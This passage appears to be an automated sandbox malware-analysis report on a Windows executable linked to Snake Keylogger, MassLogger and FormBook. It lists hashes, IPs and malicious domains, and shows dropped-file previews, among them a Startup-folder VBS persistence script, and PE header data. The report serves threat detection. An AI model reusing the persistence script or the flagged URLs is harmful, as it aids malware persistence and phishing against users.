	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
104.21.64.1	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
checkip.dyndns.com	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX	Get hash	malicious	Unknown	Browse	104.17.205.31
	https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330	Get hash	malicious	Unknown	Browse	172.64.41.3
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	104.21.95.160
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1

Process:	C:\Users\user\Desktop\MBOaS3GRtF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1036288
Entropy (8bit):	6.968838968374107
Encrypted:	false
SSDEEP:	24576:Ju6J33O0c+JY5UZ+XC0kGso6Faj+CpmmITCDWWY:ru0c++OCvkGs9Faj9QQY
MD5:	C24D00F74E24D7717A75692E6542E8D4
SHA1:	7856F14360A45EEE5D08E53B7AAACFFC7B85FCDA
SHA-256:	D9F1E70CD9264C96526B79DA353F0D2650C4019BC7E38BC42FC8D2FF88FFB807
SHA-512:	EA6B4FD8C7688BF0AACC8631CE8853234211D8D54ED1930EA4B4AF7996901283630C6B16F17DCBF662C3DD4950F6109558F2340B05399F7FDD3FFC8CB0F666DB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...ISPg.........."..................}............@..........................@............@...@.......@.....................L...\|....p...F.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....F...p...H..................@..@.reloc...q.......r...^..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Temp\aut5438.tmp

Download File

Process:	C:\Users\user\Desktop\MBOaS3GRtF.exe
File Type:	data
Category:	dropped
Size (bytes):	98074
Entropy (8bit):	7.940829858361488
Encrypted:	false
SSDEEP:	1536:aqjpJsJZmbZmYtlCu4qNChVdP5yC8g1CWD0DmX061a9uIEul6CekXAPB6U0gaYPN:aqjp6emClCu9syPgZDauna9uGBerPu7s
MD5:	0815348D03B0ABFFB02BB3A01639C1A8
SHA1:	D96D752DAA819180901E0AFEA70CDDE1577D0EEE
SHA-256:	0EF5722ABE4C7B3477A1E1B280B28C9663C7943DFFB72B9650B186C08A53A3B5
SHA-512:	68899DF45EE7267CD8E601061480B8A4DBCF2A9C03C1C64A9BFA8A22A6DBA70D17F7ABEA673BF38FF5FF4CA4050B4FE964E527D3B01DAD36F023CABFA1DA0C1F
Malicious:	false
Preview:	EA06.....@.U:..Q.R.5]w..E...4...I........d........M.....g.....Z..g?.....B.<..<..'3..,...y<.y..,.\|..Q..b.H..yV..,s.........qO..i..e.]'.d.sE..jQ).?OQ..h ....j3Z...T@.H.B.q.}(tZl..[40.mJ.uZ.......g.9..+U:...[..h ....dvoE.R.@.-..7.V@8~ ...G...>.@.?..g.9.f..3...9...v...N...&.KT..l .'>.S........%..iS....V....).>.B..53...5S.^,29..}6..i..,$...........w..b ....[C.K.`.$.].C.3.}7CK.....6o?..f........mk..V..4..@.qJ....M4..Tp."*..........@.....I.....Y5.K&`..`...2.p.B...M@..=..m..hw..f...V+U..K.".R.5....I.F.59.d..Jn.)...S..j2(...G..i59...9..Uj..{.R.Z.<..E.V ..Ef..W.U:.J.Q.X.uZ..o...[z4.I.[oU...b.@X`.jd.C..'4....I..{....ye..qP.".g...4..z.c..i5...'O...:.F{j...z.Nk].Nm..%....T,4..FZ.^Gcsz4.M.Q.W.mRqO...w...\.2G'6:l.^....[Ej.#...2Z.[.E..b>...a.......O...8J.[ME..c.8l.a......w2..)uZ.V.v. "q...Ep.K.\...w.X.u@...5......^i..T..F.O...3..B.7...3i$...U..p...U....l.wK.R' mejI[..(..../.I.y..5.....j.h.S.u9......Y..z..D.5..B.S.Kn.yV......ji...+.$.i.../.....N.l.jK..w<

C:\Users\user\AppData\Local\Temp\aut5D60.tmp

Download File

Process:	C:\Users\user\AppData\Local\Anglophile\supergroup.exe
File Type:	data
Category:	dropped
Size (bytes):	98074
Entropy (8bit):	7.940829858361488
Encrypted:	false
SSDEEP:	1536:aqjpJsJZmbZmYtlCu4qNChVdP5yC8g1CWD0DmX061a9uIEul6CekXAPB6U0gaYPN:aqjp6emClCu9syPgZDauna9uGBerPu7s
MD5:	0815348D03B0ABFFB02BB3A01639C1A8
SHA1:	D96D752DAA819180901E0AFEA70CDDE1577D0EEE
SHA-256:	0EF5722ABE4C7B3477A1E1B280B28C9663C7943DFFB72B9650B186C08A53A3B5
SHA-512:	68899DF45EE7267CD8E601061480B8A4DBCF2A9C03C1C64A9BFA8A22A6DBA70D17F7ABEA673BF38FF5FF4CA4050B4FE964E527D3B01DAD36F023CABFA1DA0C1F
Malicious:	false
Preview:	EA06.....@.U:..Q.R.5]w..E...4...I........d........M.....g.....Z..g?.....B.<..<..'3..,...y<.y..,.\|..Q..b.H..yV..,s.........qO..i..e.]'.d.sE..jQ).?OQ..h ....j3Z...T@.H.B.q.}(tZl..[40.mJ.uZ.......g.9..+U:...[..h ....dvoE.R.@.-..7.V@8~ ...G...>.@.?..g.9.f..3...9...v...N...&.KT..l .'>.S........%..iS....V....).>.B..53...5S.^,29..}6..i..,$...........w..b ....[C.K.`.$.].C.3.}7CK.....6o?..f........mk..V..4..@.qJ....M4..Tp."*..........@.....I.....Y5.K&`..`...2.p.B...M@..=..m..hw..f...V+U..K.".R.5....I.F.59.d..Jn.)...S..j2(...G..i59...9..Uj..{.R.Z.<..E.V ..Ef..W.U:.J.Q.X.uZ..o...[z4.I.[oU...b.@X`.jd.C..'4....I..{....ye..qP.".g...4..z.c..i5...'O...:.F{j...z.Nk].Nm..%....T,4..FZ.^Gcsz4.M.Q.W.mRqO...w...\.2G'6:l.^....[Ej.#...2Z.[.E..b>...a.......O...8J.[ME..c.8l.a......w2..)uZ.V.v. "q...Ep.K.\...w.X.u@...5......^i..T..F.O...3..B.7...3i$...U..p...U....l.wK.R' mejI[..(..../.I.y..5.....j.h.S.u9......Y..z..D.5..B.S.Kn.yV......ji...+.$.i.../.....N.l.jK..w<

C:\Users\user\AppData\Local\Temp\autA14E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Anglophile\supergroup.exe
File Type:	data
Category:	dropped
Size (bytes):	98074
Entropy (8bit):	7.940829858361488
Encrypted:	false
SSDEEP:	1536:aqjpJsJZmbZmYtlCu4qNChVdP5yC8g1CWD0DmX061a9uIEul6CekXAPB6U0gaYPN:aqjp6emClCu9syPgZDauna9uGBerPu7s
MD5:	0815348D03B0ABFFB02BB3A01639C1A8
SHA1:	D96D752DAA819180901E0AFEA70CDDE1577D0EEE
SHA-256:	0EF5722ABE4C7B3477A1E1B280B28C9663C7943DFFB72B9650B186C08A53A3B5
SHA-512:	68899DF45EE7267CD8E601061480B8A4DBCF2A9C03C1C64A9BFA8A22A6DBA70D17F7ABEA673BF38FF5FF4CA4050B4FE964E527D3B01DAD36F023CABFA1DA0C1F
Malicious:	false
Preview:	EA06.....@.U:..Q.R.5]w..E...4...I........d........M.....g.....Z..g?.....B.<..<..'3..,...y<.y..,.\|..Q..b.H..yV..,s.........qO..i..e.]'.d.sE..jQ).?OQ..h ....j3Z...T@.H.B.q.}(tZl..[40.mJ.uZ.......g.9..+U:...[..h ....dvoE.R.@.-..7.V@8~ ...G...>.@.?..g.9.f..3...9...v...N...&.KT..l .'>.S........%..iS....V....).>.B..53...5S.^,29..}6..i..,$...........w..b ....[C.K.`.$.].C.3.}7CK.....6o?..f........mk..V..4..@.qJ....M4..Tp."*..........@.....I.....Y5.K&`..`...2.p.B...M@..=..m..hw..f...V+U..K.".R.5....I.F.59.d..Jn.)...S..j2(...G..i59...9..Uj..{.R.Z.<..E.V ..Ef..W.U:.J.Q.X.uZ..o...[z4.I.[oU...b.@X`.jd.C..'4....I..{....ye..qP.".g...4..z.c..i5...'O...:.F{j...z.Nk].Nm..%....T,4..FZ.^Gcsz4.M.Q.W.mRqO...w...\.2G'6:l.^....[Ej.#...2Z.[.E..b>...a.......O...8J.[ME..c.8l.a......w2..)uZ.V.v. "q...Ep.K.\...w.X.u@...5......^i..T..F.O...3..B.7...3i$...U..p...U....l.wK.R' mejI[..(..../.I.y..5.....j.h.S.u9......Y..z..D.5..B.S.Kn.yV......ji...+.$.i.../.....N.l.jK..w<

C:\Users\user\AppData\Local\Temp\preconform

Download File

Process:	C:\Users\user\Desktop\MBOaS3GRtF.exe
File Type:	data
Category:	dropped
Size (bytes):	134144
Entropy (8bit):	7.01369980503004
Encrypted:	false
SSDEEP:	3072:HgC21nYCP+qaRTS91Or/uVqgSc/B2MQRa2dpq9xX:rCnlP+qaRTSjOr/xgScYdXdA9
MD5:	9A8214CB6AF13D0D5AC341E0F2D8B16F
SHA1:	9FC65C9142144327270F9812A8C1FD9B2F618813
SHA-256:	7A1D9795F989CCF17D7D2E2BD39377C3206EFBD906D7C966B7A24904322FE476
SHA-512:	95B786B73E039D3DC03B07B8D8F65B3EDF6462F618FF0447A5894858FAFBBC78DA46ED7B85B08AA56ECA8732F5BC45D4DA0C075166EFD1193CA9F96796C9E3E5
Malicious:	false
Preview:	...SA8OQTKQU..AE.79IS5YIyGXZSB8OQPKQUQ9AEM79IS5YI9GXZSB8OQPK.UQ9OZ.99.Z.x.8..{.Q<q 9>2#X,e.VW'<Ay+\g/=bQ!q...u<V% c:4Cw5YI9GXZ..8O.QHQ.\|.'EM79IS5Y.9EYQR.8O.QKQAQ9AEM7.]Q5Yi9GXzQB8O.PKqUQ9CEM39IS5YI9CXZSB8OQP+SUQ;AEM79IQ5..9GHZSR8OQP[QUA9AEM79YS5YI9GXZSB87ERK.UQ9AeO7VYS5YI9GXZSB8OQPKQUQ9.GM;9IS5YI9GXZSB8OQPKQUQ9AEM79IS5YI9GXZSB8OQPKQUQ9AEM79Is5YA9GXZSB8OQPKYuQ9.EM79IS5YI9Gv.6:LOQP..TQ9aEM7.HS5[I9GXZSB8OQPKQUq9A%cEJ;05YIVWXZSb:OQBKQU.8AEM79IS5YI9GX.SBxa#5'>6Q9MEM79.Q5YK9GXPQB8OQPKQUQ9AEMw9I.5YI9GXZSB8OQPKQU.-CEM79I.5YI;G]Z.a9OM.KQVQ9A.M7?.q4Y.9GXZSB8OQPKQUQ9AEM79IS5YI9GXZSB8OQPKQUQ9AEM.D.\..P4..SB8OQPJSVU?IMM79IS5YIGGXZ.B8O.PKQbQ9A`M79$S5Ym9GX$SB81QPK5UQ93EM7XIS5.I9G7ZSBVOQP5QUQ'Cmm79Cy.YK.fXZYB.."rKQ_.8AEID.IS?.K9G\)wB8E.SKQQ".AEG.=IS1*o9GR.VB8K{.KR.G?AEVX.IS?YJ.R^ZSY.iQRckUQ3Aok7:.F3YI"mzZQ.1OQTa.&L9ACet9IYAPI9E.PSB<eORc.UQ3kg3'9IW.Yc.9IZSF.O{r5CUQ=jEg.GZS5]b9mz$GB8KzPaOW.-AEI..7F5YM.Grx-T8OU{K{w/.AEI.9cM7.^9G\pUhZO#iWQ%RV.EM1..S5SaYGX\Sh.O/pKQQSV.EM=.c.5[a=FXPS@;2gPKUWUDvEM3..S7"p9

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs

Download File

Process:	C:\Users\user\AppData\Local\Anglophile\supergroup.exe
File Type:	data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.388801427600427
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclmVzUEZ+lX1kl4K5LJnriIM8lfQVn:DsO+vNlGQ1klHzmA2n
MD5:	872BB642F9D4EE0F787626D22BF91563
SHA1:	6370D68FDBA06949811C7466213A709D05226789
SHA-256:	7E12295B35BB9D3382B1E06F1C5881C6417FE1BE34C6213721C47EEDD39CF47A
SHA-512:	D280B6004530C86C0233A1B4820B7E1D454AB7EAEB98954A08FA0F560242B3BC39C08C22696D87240E5DEBA699898D3697BB889455763CA003808829B2B696A4
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.A.n.g.l.o.p.h.i.l.e.\.s.u.p.e.r.g.r.o.u.p...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.968838968374107
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MBOaS3GRtF.exe
File size:	1'036'288 bytes
MD5:	c24d00f74e24d7717a75692e6542e8d4
SHA1:	7856f14360a45eee5d08e53b7aaacffc7b85fcda
SHA256:	d9f1e70cd9264c96526b79da353f0d2650c4019bc7e38bc42fc8d2ff88ffb807
SHA512:	ea6b4fd8c7688bf0aacc8631ce8853234211d8d54ed1930ea4b4af7996901283630c6b16f17dcbf662c3dd4950f6109558f2340b05399f7fdd3ffc8cb0f666db
SSDEEP:	24576:Ju6J33O0c+JY5UZ+XC0kGso6Faj+CpmmITCDWWY:ru0c++OCvkGs9Faj9QQY
TLSH:	A425AE2273DDC360CB669173BF6AB7016EBF3C614630B85B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67505349 [Wed Dec 4 13:04:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F1F613F961Ah
jmp 00007F1F613EC3E4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1F613EC56Ah
cmp edi, eax
jc 00007F1F613EC8CEh
bt dword ptr [004C31FCh], 01h
jnc 00007F1F613EC569h
rep movsb
jmp 00007F1F613EC87Ch
cmp ecx, 00000080h
jc 00007F1F613EC734h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1F613EC570h
bt dword ptr [004BE324h], 01h
jc 00007F1F613ECA40h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1F613EC70Dh
test edi, 00000003h
jne 00007F1F613EC71Eh
test esi, 00000003h
jne 00007F1F613EC6FDh
bt edi, 02h
jnc 00007F1F613EC56Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1F613EC573h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1F613EC5C5h
bt esi, 03h
jnc 00007F1F613EC618h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x34688	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfc000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x34688	0x34800	415080bad5281a66b491093b55ac5880	False	0.8738839285714286	data	7.760341246734815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfc000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
